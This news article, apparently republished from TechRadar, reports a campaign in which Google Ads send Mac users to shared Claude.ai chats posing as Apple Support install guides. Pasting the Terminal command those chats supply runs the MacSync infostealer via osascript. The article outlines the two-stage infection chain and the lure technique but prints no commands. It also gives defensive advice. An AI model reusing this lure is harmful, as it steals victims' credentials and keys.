A Claude Mac malware scam is actively targeting developers and Mac users who search for legitimate Claude installation instructions, exploiting Google Ads and Claude.ai’s own shared chat feature to distribute information-stealing malware. Security engineer Berk Albayrak at Trendyol Group identified the campaign, which uses remarkably simple but effective social engineering: fake installation guides hosted on Claude.ai itself, presented as official Apple Support documentation. When users paste the provided command into Terminal, they unknowingly download and execute malware that harvests browser credentials, cookies, and macOS Keychain contents.
Key Takeaways
- Scammers use Google Ads targeting “Claude mac download” searches to redirect users to malicious shared Claude.ai chats
- Fake installation guides impersonate Apple Support and instruct users to paste Terminal commands that execute malware
- MacSync infostealer targets browser credentials, cookies, and macOS Keychain data without dropping a traditional executable
- Campaign bypasses URL-based security filters by hosting malware on legitimate claude.ai domain
- Similar December campaign exploited ChatGPT and Grok shared chats using identical social engineering tactics
How the Claude Mac Malware Scam Works
The Claude Mac malware scam operates through a deceptively simple chain of trust exploitation. When a user searches Google for “Claude mac download,” a sponsored ad appears pointing to claude.ai—a legitimate domain. The ad directs users to a publicly shared Claude.ai chat that presents itself as an official “Claude Code on Mac” installation guide attributed to Apple Support. The chat then instructs the user to open Terminal and paste a command. That command silently downloads and executes malware using osascript, macOS’s built-in scripting engine, which allows remote code execution without requiring a traditional executable binary to be installed.
What makes this attack particularly dangerous is that every visible element appears legitimate. The ad comes from Google, the destination is claude.ai, and the branding mimics Apple Support. A user accustomed to copy-pasting installation commands—a common practice among developers—has no obvious reason to suspect the instructions are malicious. The malware then harvests sensitive data: browser credentials, cookies stored in browsers like Chrome and Safari, and contents of the macOS Keychain, which stores passwords, API keys, and authentication tokens.
Some variants of the Claude Mac malware scam employ a two-stage infection chain. The initial command downloads a first-stage payload that profiles the system, determining what data is worth stealing before the second stage downloads and executes the main infostealer. Other variants skip profiling entirely and proceed directly to execution, prioritizing speed over reconnaissance.
Why This Campaign Bypasses Traditional Security
The Claude Mac malware scam succeeds where other malware distribution campaigns fail because it weaponizes legitimate infrastructure. Traditional malvertising relies on fake domains—attackers register lookalike sites like “claude-ai.com” or “c1aude.ai” to fool users into believing they are visiting the real service. Security tools can block these domains through reputation-based filtering. But this campaign uses the actual claude.ai domain, making URL-based security filters useless.
Similarly, the malicious instructions are hosted within Claude.ai’s own shared chat feature, a legitimate platform feature designed for collaboration and knowledge sharing. Security controls that scan URLs for malicious content pass these chats through because the URL itself—claude.ai—is trusted. The malware payload is embedded in natural language instructions rather than in a downloadable file, further evading file-based detection systems. This represents a broader shift in attacker tactics: instead of building fake infrastructure, they are abusing the legitimate features of trusted platforms.
The campaign also exploits a fundamental vulnerability in developer culture. Developers routinely copy and paste installation commands from documentation, package managers, and trusted sources. This practice is so normalized that a command presented as official documentation triggers little skepticism, especially when the surrounding context—the domain, the branding, the formatting—all appear authentic.
Related Threats and Broader Pattern
The Claude Mac malware scam is not an isolated incident. In December, security researchers identified a nearly identical campaign exploiting shared chats on ChatGPT and Grok using the same social engineering playbook: fake installation guides, copy-paste Terminal commands, and malware execution through legitimate platform features. Windows users have also been targeted with Claude Code-themed campaigns distributing different payloads, including variants of the Amatera infostealer and other credential-stealing malware. This pattern suggests attackers have identified AI platform shared chats as a reliable vector for malware distribution—low friction, high trust, and difficult to detect at scale.
The targeting of macOS Keychain specifically indicates attackers understand the value of the data they are stealing. The Keychain stores not just passwords but API keys, SSH credentials, and authentication tokens for development tools and cloud services. For a developer, compromised Keychain contents represent a gateway to compromising GitHub accounts, cloud infrastructure, and internal company systems.
What Mac Users Should Do Right Now
If you use Claude and searched for installation instructions recently, verify that you downloaded Claude from the official Anthropic website (anthropic.com) or through legitimate package managers like Homebrew. Do not paste Terminal commands from unfamiliar sources, even if they appear to come from official documentation. Legitimate installation guides from reputable companies rarely require users to paste long commands directly into Terminal without explanation—this is a hallmark of ClickFix social engineering attacks.
Check your browser for unauthorized extensions or changes to settings. If you believe you may have run a malicious command, change your passwords immediately, particularly for GitHub, cloud services, and any accounts that store sensitive credentials. Consider running a macOS security scan using built-in tools like XProtect or third-party antivirus software, though be aware that sophisticated infostealers may not be detected by signature-based scanning if they focus on exfiltrating data rather than maintaining persistent access.
Anthropic and Google have been notified of the campaign. Both platforms have incentives to shut down the malicious chats and prevent similar ads, but the speed at which new variants appear suggests this will remain an ongoing cat-and-mouse game. Vigilance is the most reliable defense.
Is the Claude Mac malware scam still active?
Yes, the campaign was active at the time of reporting and variants continue to emerge. Both the malicious Google Ads and the shared Claude.ai chats hosting the fake installation guides were publicly accessible, suggesting attackers maintain multiple copies across different shared chat URLs to ensure continuity if individual chats are removed.
Can macOS security tools detect this malware?
Standard antivirus software may not detect the initial infection because the malware is executed through osascript rather than dropped as a traditional executable file. Detection depends on whether security tools monitor system behavior (such as unusual osascript activity) or only scan files. After infection, stolen data is exfiltrated to attacker-controlled servers, making post-infection detection more difficult.
How is this different from the December ChatGPT campaign?
The December campaign exploited ChatGPT and Grok shared chats using identical tactics but different malware payloads and infrastructure. The Claude Mac malware scam demonstrates that attackers have refined the technique and are systematically targeting multiple AI platforms, suggesting this is now a preferred distribution method for credential-stealing malware targeting developers.
The Claude Mac malware scam reveals a critical vulnerability in how we trust platforms and documentation. Attackers have learned that the most effective way to distribute malware is not to build fake infrastructure but to hijack legitimate platforms and exploit user behavior around installation and setup. As AI platforms become more central to developer workflows, they will continue to attract attackers seeking to compromise high-value targets. The defense is skepticism: verify sources, avoid blind copy-paste, and treat any installation instruction that arrives through an unexpected channel with suspicion, regardless of how official it appears.
Edited by the All Things Geek team.
Source: TechRadar
